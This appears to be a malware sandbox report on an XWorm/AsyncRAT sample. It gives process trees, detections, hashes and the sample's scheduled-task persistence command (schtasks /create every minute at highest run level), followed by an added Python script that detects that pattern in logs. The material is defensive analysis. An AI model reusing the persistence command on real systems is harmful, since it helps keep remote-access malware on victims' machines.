Commandline: "C:\Users\user\Desktop\wzcsapi.exe"
Imagebase: 0x6d0000
File size: 34'816 bytes
MD5 hash: 64FFE7C0FA6AC22F5ACAFD3CEB4ACA5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 83%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 4
Start time: 05:20:21
Start date: 15/10/2024
Path: C:\Users\user\Desktop\wzcsvc.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\wzcsvc.exe"
Imagebase: 0x7ff6b5ad0000
File size: 165'376 bytes
MD5 hash: A69C6E092D415063A9FB80F8FE4E3444
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              • Detection: 88%, ReversingLabs
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:05:20:21
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:05:20:21
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\winlogon.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:winlogon.exe
                                                                                                                                                                                                                                              Imagebase:0x7ff6fc1b0000
                                                                                                                                                                                                                                              File size:906'240 bytes
                                                                                                                                                                                                                                              MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:05:20:21
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 432 -p 1408 -ip 1408
                                                                                                                                                                                                                                              Imagebase:0x7ff683ca0000
                                                                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                              Start time:05:20:21
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 1408 -s 1088
                                                                                                                                                                                                                                              Imagebase:0x7ff683ca0000
                                                                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                              Start time:05:20:21
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\lsass.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\lsass.exe
                                                                                                                                                                                                                                              Imagebase:0x7ff6d9390000
                                                                                                                                                                                                                                              File size:59'456 bytes
                                                                                                                                                                                                                                              MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                              Start time:05:20:22
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                              Start time:05:20:22
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

Target ID:12
Start time:05:20:23
Start date:15/10/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcsapi" /tr "%Current%\wzcsapi.exe"
Imagebase:0x7ff74bbf0000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true
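
The schtasks.exe command line above is the sample's persistence step: it force-creates (/f) a task named "wzcsapi" that runs every minute (/sc minute /mo 1) with the highest available run level (/rl highest), and the action path contains the literal, unexpanded placeholder %Current% exactly as the report shows it. The following is an added hunting example, not part of the Joe Sandbox report or of the sample: it parses schtasks /create command lines out of constructed process-creation log lines (pid|image|commandline, made up for this example) and flags task registrations that combine a high-frequency trigger, an elevated run level, a force overwrite, and an action outside trusted Windows directories or using a variable Windows does not define. The log format, the trusted-directory list and the scoring threshold are assumptions for illustration.

```python
"""Hunt for schtasks /create persistence with the profile seen in this report."""
import re
import shlex
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample process-creation log (not taken from the report's event data).
# Format assumed here: "<pid>|<image>|<command line>", one event per line.
SAMPLE_LOG = """\
5120|C:\\Windows\\System32\\schtasks.exe|"C:\\Windows\\System32\\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcsapi" /tr "%Current%\\wzcsapi.exe"
5200|C:\\Windows\\System32\\schtasks.exe|schtasks.exe /create /sc daily /st 03:00 /tn "Backup" /tr "C:\\Program Files\\Backup\\backup.exe"
5300|C:\\Windows\\System32\\schtasks.exe|schtasks /create /sc onlogon /rl highest /tn "Updater" /tr "C:\\Users\\bob\\AppData\\Roaming\\svc.exe"
5400|C:\\Windows\\System32\\schtasks.exe|schtasks /query /tn "wzcsapi"
"""

# Assumed allowlist: directories a legitimately installed task action usually lives in.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Assumed allowlist: environment variables Windows itself defines for a task action.
KNOWN_VARS = {"systemroot", "windir", "programfiles", "programfiles(x86)", "programdata"}


@dataclass
class Finding:
    pid: str
    task_name: str
    action: str
    reasons: list = field(default_factory=list)


def parse_schtasks(cmdline: str) -> Optional[dict]:
    """Return the switches of a schtasks /create command line, or None otherwise.

    Switches followed by a non-switch token take that token as their value
    (/sc minute, /tr "..."); bare switches such as /create and /f map to True.
    """
    # posix=False keeps Windows backslashes intact and groups quoted arguments.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not tokens or "schtasks" not in tokens[0].lower():
        return None
    opts = {}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            nxt = tokens[i + 1] if i + 1 < len(tokens) else None
            if nxt is not None and not nxt.startswith("/"):
                opts[tok.lower()] = nxt
                i += 2
            else:
                opts[tok.lower()] = True
                i += 1
        else:
            i += 1
    return opts if opts.get("/create") else None


def assess(opts: dict) -> list:
    """Score one /create registration; each returned string is one suspicious trait."""
    reasons = []
    sc, mo = opts.get("/sc", "").lower(), opts.get("/mo", "")
    if sc == "minute" and mo.isdigit() and int(mo) <= 5:
        reasons.append(f"high-frequency trigger: /sc minute /mo {mo}")
    if opts.get("/rl", "").lower() == "highest":
        reasons.append("elevated run level: /rl highest")
    if opts.get("/f") is True:
        reasons.append("force-overwrites an existing task: /f")
    action = opts.get("/tr", "")
    if action and not action.lower().startswith(TRUSTED_DIRS):
        reasons.append(f"action outside trusted directories: {action}")
    for var in re.findall(r"%([^%\\/]+)%", action):
        if var.lower() not in KNOWN_VARS:
            reasons.append(f"action uses a variable Windows does not define: %{var}%")
    return reasons


def hunt(log_text: str, threshold: int = 2) -> list:
    """Return a Finding for every /create whose trait count reaches the threshold."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        pid, _image, cmdline = line.split("|", 2)
        opts = parse_schtasks(cmdline)
        if opts is None:
            continue
        reasons = assess(opts)
        if len(reasons) >= threshold:
            findings.append(Finding(pid, opts.get("/tn", "?"), opts.get("/tr", "?"), reasons))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"pid {f.pid} task {f.task_name!r} -> {f.action}")
        for r in f.reasons:
            print("   -", r)
```

On the constructed log the "wzcsapi" registration trips every trait, the "Updater" task is flagged for the elevated run level plus an action under a user profile, and the daily backup task in Program Files is left alone. Because the report shows schtasks.exe running with elevated privileges, /rl highest succeeds here; on an unelevated host the same command would register a task that only runs at the caller's integrity level, so the trait weighting, not any single switch, is what carries the detection.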

Target ID:13
Start time:05:20:23
Start date:15/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:05:20:23
Start date:15/10/2024
Path:C:\Windows\System32\dwm.exe
Wow64 process (32bit):false
Commandline:"dwm.exe"
Imagebase:0x7ff74b010000
File size:94'720 bytes
MD5 hash:5C27608411832C5B39BA04E33D53536C
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:15
Start time:05:20:26
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:16
Start time:05:20:26
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:17
Start time:05:20:27
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:18
Start time:05:20:27
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:19
Start time:05:20:28
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:20
Start time:05:20:28
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:21
Start time:05:20:28
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:22
Start time:05:20:29
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                              Start time:05:20:29
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                              Start time:05:20:30
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                              Start time:05:20:31
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                              Start time:05:20:31
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                              Start time:05:20:32
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                              Start time:05:20:32
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                              Start time:07:03:01
                                                                                                                                                                                                                                              Start date:15/10/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                                                                                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                              Start time:07:03:02
                                                                                                                                                                                                                                              Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:07:03:02
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:33
Start time:07:03:04
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:34
Start time:07:03:04
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:35
Start time:07:03:04
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:36
Start time:07:03:05
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:37
Start time:07:03:05
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:38
Start time:07:03:06
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:39
Start time:07:03:07
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:40
Start time:07:03:07
Start date:15/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Execution Graph

Execution Coverage: 5.8%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 4.6%
Total number of Nodes: 131
Total number of Limit Nodes: 10
Strings
Memory Dump Source
• Source File: 00000001.00000002.1600102747.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffaac560000_r8k29DBraE.jbxd
Similarity
• API ID:
• String ID: 0W$b4$r6$r6$r6$r6
• API String ID: 0-2485616068
• Opcode ID: 6fef828fced36ecf08f310f08a1a4bb619caccd4b0719aab082e4cbee0a0039c
• Instruction ID: d02396f08a380a3596a354063c1759dc7da599885189e6e9bedc2eb50ce036b4
• Opcode Fuzzy Hash: 6fef828fced36ecf08f310f08a1a4bb619caccd4b0719aab082e4cbee0a0039c
• Instruction Fuzzy Hash: 78828B70D4861A8FEB48EF68C4959FDB7F1FF49300F1485A9E01AE7292DA38E945CB50

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000001.00000002.1600102747.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffaac560000_r8k29DBraE.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
• Opcode ID: 6a8b4a6511aa9f747acdce01df3f3901a931448b1d47ea36ed90acfcb77bd5c0
• Instruction ID: a3fd3201f30c87a7974bab511727788a91113be0c0c134c799f6400a306f2b8f
• Opcode Fuzzy Hash: 6a8b4a6511aa9f747acdce01df3f3901a931448b1d47ea36ed90acfcb77bd5c0
• Instruction Fuzzy Hash: 2E31273190DB888FD72ADBB89846AEABFE1EF56321F04426FD049D3192DF646405C791
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 88873d5e8effef870f871fb690e3c29cc47414f70acfd919428cbb2d8d881e99
• Instruction ID: 7f2807fb56c26457052148eb119a9d4293cf739ade85c4c5c37ba724a49560c0
• Opcode Fuzzy Hash: 88873d5e8effef870f871fb690e3c29cc47414f70acfd919428cbb2d8d881e99
• Instruction Fuzzy Hash: AC21A23A7047848AE3288F16E84462EB7E9F786F84F598019DE8953B54DF35EC96CB00

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
